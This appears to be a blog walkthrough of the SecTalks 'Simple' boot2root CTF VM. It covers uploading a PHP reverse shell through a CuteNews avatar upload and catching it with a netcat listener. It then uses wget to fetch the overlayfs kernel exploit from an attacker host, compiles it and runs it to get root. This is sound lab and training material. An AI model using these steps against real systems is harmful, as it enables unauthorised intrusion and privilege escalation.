SecTalks: BNE0x03 – Simple

Simple CTF

Simple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal.

I suggest you use VirtualBox or VMWare Player with a Host Only adapter. The VM will assign itself an IP address through DHCP.

Location
https://www.dropbox.com/s/9spf5m9l87zjlps/Simple.ova?dl=0 [File size: 600MB]

Hints
Get a user shell by uploading a reverse shell and executing it.
A proxy may help you to upload the file you want, rather than the file that the server expects.
There are 3 known privesc exploits that work. Some people have had trouble executing one of them unless it was over a reverse shell using a netcat listener.

Contact @RobertWinkel for more hints.

Let’s get started.

Enumeration

nmap -p- -sV 192.168.2.15

nmap

It seems there is a web server running on port 80.
Let’s check it out.

cutenews

So the site is running on CuteNews 2.0.3. Would there be a security issue with this piece of software? Yes there is. Looks like there is a possibility for a ‘Arbitrary File Upload’.

https://www.exploit-db.com/exploits/37474/

First step is to register an account and log in.
Then to change the personal settings and change the avatar with……..a shell.php!
Courtesy of pentestmonkey.
Third step is to start a terminal and start listening on the port you configured in the reverse shell code.

nc -lvnp 31337

Fourth and final step is to find the uploaded file and click on it. It can be found on ‘/uploads/’.

listening

We got a limited shell. Let’s try to break out of this box.
First let’s get a proper shell.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

root

To get root, I first need to know what is running.

lsb_release -a

lsb_release

So it’s running on Ubuntu 14.04. That’s nice. So let’s get the kernel version.

uname -a

uname

Now let’s find a vulnerability on exploit-db.
For now I’m going for the ‘Overlayfs’ Local Root Exploit.
(https://www.exploit-db.com/exploits/39166/)
Let’s transport the file to the compromised system.

cd /tmp
wget http://192.168.2.9/overlayfs.c

wget

Let’s compile it and try to run it.

gcc overlayfs.c -o overlayfs
chmod 755 overlayfs
./overlayfs

root

We got root!
Let’s get a proper shell again.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

With a proper shell it’s time to scour the system in search for interesting files.
Let’s check the root directory. And there is the flag.

flag

Et voila!

Advertenties